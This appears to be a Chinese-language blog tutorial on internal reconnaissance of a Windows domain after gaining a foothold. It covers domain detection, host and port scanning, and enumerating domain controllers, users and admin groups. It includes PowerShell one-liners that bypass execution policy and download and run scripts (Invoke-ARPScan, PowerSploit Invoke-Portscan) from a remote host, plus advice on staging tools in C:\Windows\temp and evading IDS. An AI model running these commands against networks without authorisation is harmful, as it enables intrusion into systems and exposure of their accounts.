域内信息收集

知识点一:判断是否有域

方法一:ipconfig /all

首先在cmd中输入ipconfig /all,可以看到以下内容,可以看到有域

也可以使用nslookup进行反查dns

方法二:systeminfo

在cmd中直接输入systeminfo,可以直接看到有域的信息。

登陆服务器即为域控,后面的名称则为域控的名称。

方法三:net config workstation

方法四:net time /domain(查域控的时候也可以用)

有三种情况:

情况一:存在域,当前用户是域用户

情况二:存在域,当前用户不是域用户

情况三:不存在域

知识点二:域内存活主机探测

推荐:将工具放到C盘中的Windows目录下的temp目录中

方法一:利用netbios快速探测内网

工具:Nbtscan

使用方法:nbtscan.ext IP

方法二:利用ICMP协议探测内网

工具:(注意根据实际情况更改IP地址)

ping命令:for /L %I in (1,1,254) DO @ping -w 1 -n 1 192.168.1.%I | findstr “TTL=”

vbs脚本:icmb.vbs

 

方法三:利用arp扫描完整探测内网

工具:

1.arp-scan       命令:arp.exe -t IP

2.Invoke-ARPScan.ps1

命令:

我这里因为已经将脚本上传到机器中,所以直接使用第二种命令。

A:远程下载并运行

powershell -nop -exec bypass -c “IEX (New-Object Net.WebClient).DownloadString(‘http://192.168.1.1/Invoke-ARPScan.ps1’);Invoke-ARPScan -CIDR 192.168.1.0/24” >> C:\windows\temp\log.txt

B:本地直接运行

powershell.exe -exec bypass -Command “&{Import-Module C:\windows\temp\Invoke-ARPScan.ps1;Invoke-ARPScan.ps1;Invoke-ARPScan -CIDR 192.168.1.0/24}” >> C:\windows\temp\log.txt

C:无条件运行

方法四:利用常规tcp/udp端口扫描探测内网

工具:scanline

命令:scanline.exe -h -t 22,80-89,110,389,445,3389,1099,1433,2049,6379,7001,8080,1521,3306,5432 -u 53,161,137,139 -O c:\windows\temp\sl_res.txt -p 192.168.1.1-254 /b

知识点三:域内端口扫描

注意:扫描是否会触发IDS

方法一:telnet命令

方法二:s扫描器

在win2003以下会扫描比较快,但是在win2003以上可能会有错误,建议使用tcp扫描

命令:s.exe TCP 192.168.1.1 192.168.1.13 445,3389,80 256 /Banner /save

方法三:metasploit

search portscan

方法四:域内端口扫描

工具:Invoke-portscan.ps1

命令:

powershell.exe -nop -exec bypass -c “IEX(New-Object Net.WebClient).DownloadString(‘https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/Invoke-Portscan.ps1’);Invoke-Portscan -Hosts 192.168.1.0/24 -T 4 -ports ‘445,1433,8080,3389,80’ -oA C:\windows\temp\res.txt”

powershell.exe -exec bypass -Command “&{Import-Module C:\windows\temp\Invoke-Portscan.ps1;Invoke-Portscan.ps1;Invoke-Portscan -Hosts 192.168.1.0/24 -T 4 -ports ‘445,1433,8080,3389,80’}” >> C:\windows\temp\log2.txt

 

知识点四:域内基础信息收集

net view /domain

net view /domain:XXX

net group /domain

net group “domain computers” /domain

net accounts /domain

nltest /domain_trusts

知识点五:域控制器的查找

nltest /DCLIST:xxxx

nslookup -type=SRV _ldap._tcp

net time /domain

net group “Domain Controllers” /domain

netdom query pdc

知识点六:域内用户和管理员的获取

查询所有域用户列表

net user /domain

wmic useraccount get /all

dsquery user

net localgroup administrators /domain

查询域管理员用户组

net group “domain admins” /domain

net group “Enterprise Admins” /domain

发表评论

电子邮件地址不会被公开。 必填项已用*标注